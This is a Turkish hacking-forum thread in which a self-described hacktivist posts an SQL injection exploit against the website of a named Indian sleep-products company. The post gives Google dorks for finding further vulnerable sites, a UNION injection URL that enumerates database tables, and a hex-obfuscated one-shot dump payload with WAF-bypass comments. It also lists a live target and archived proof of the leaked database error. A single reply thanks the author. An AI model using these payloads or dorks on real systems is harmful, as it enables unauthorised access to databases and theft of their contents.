Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: SleePediain SleepwellFoundation India SQL Inj Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 91 / 100
Rep Sayısı: 2768
Mesaj Sayısı: 6324
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
SleePediain SleepwellFoundation India SQL Inj Vuln
21.06.2018 19:36
################################################################################​#################

# Exploit Title : SleePedia.in an initiative of SleepwellFoundation India Nepal Bhutan SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 21/06/2018
# Vendor Homepage : sleepedia.in ~ sleepwellfoundation.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dorks :

inurl:''/products/searchByKeyword/?keyword_search=''

inurl:''/cms/store_locator''

inurl:''/products/product_detail/''

# Note : Search in this domain extensions => site:np site:in site:bt site:com site:net site:org

# Exploit : /products/searchByKeyword/?keyword_search=.1'

+ Data =>

LOCALHOST/products/searchByKeyword/?keyword_search=.1%27%20union%20select%201,2,3,4,group_concat(table_name,column_​name),6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_sc​hema=database()--+-

+ Dump in one shot =>

LOCALHOST/products/searchByKeyword/?keyword_search=.1%27%20union%20select%201,2,3,4,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c​62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207​e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6​c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e2​03c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e742063​6f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@versio​n_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c​62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7​420636f6c6f723d626c61636b3e,LPAD(@r:[email protected]%2b1,%202,%200x30),0x2e203c2f666f6e743e,@​tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a20446174616261736520​3a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f66​6f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c616​36b3e,LPAD(@running_number:[email protected]_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,​0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=​database()--+-

################################################################################​#################

# Example Site : sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1%27 => [ Proof of Concept for SQL Inj ] => archive.is/8wz2E

# SQL Database Error :

A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '%' or V.product_Specification like '%.1'%' group by V.pid' at line 10
SELECT V.`id`, V.`cid`, V.`scid`,V.`pid`, V.`product_name`, V.`length`, V.`thickness`, V.`breadth`, V.`price`, V.`status`,
V.`state`,P.slug, P.detail_image FROM `sw_product_variant` V, sw_product P WHERE V.pid = P.id AND V.`status` = '1'
AND P.status='1' AND V.price!='0' AND V.list_show='1' AND V.state='' and V.product_name like '%.1'%' or
V.product_Specification like '%.1'%' group by V.pid
Filename: models/Product_model.php
Line Number: 1152

+ Proof of Concept : archive.is/h20Ww - archive.is/hKhSa

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
Rep Verenler: Leader Shawai
Leader Shawai
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 25
Yaşam Puanı: 437 / 616
Deneyim: 67 / 100
Rep Sayısı: 343
Mesaj Sayısı: 815
Üyelik Tarihi: 24.10.2015
     
Yorum: #2
RE: SleePediain SleepwellFoundation India SQL Inj Vuln
21.06.2018 20:43
Teşekkürler, Emeğine Sağlık Smile


Alinti



1 Ziyaretçi